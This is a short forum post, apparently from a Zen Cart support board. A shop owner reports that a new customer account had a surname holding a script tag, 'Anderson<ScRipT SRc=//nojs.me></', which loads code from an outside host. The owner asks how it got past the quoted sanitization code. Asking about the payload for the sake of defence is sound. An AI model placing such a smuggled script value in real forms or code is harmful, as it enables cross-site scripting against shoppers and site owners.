I have a site running Zen Cart 1.5.7c with lat9's excellent One Page Checkout module.
A recent account created showed the following surname entry.
I checked the form fields and they are written likeCode:Anderson<ScRipT SRc=//nojs.me></
How did this get passed zen carts' data sanitization?Code:$firstname = zen_db_prepare_input(zen_sanitize_string($_POST['firstname'])); $lastname = zen_db_prepare_input(zen_sanitize_string($_POST['lastname']));
Bookmarks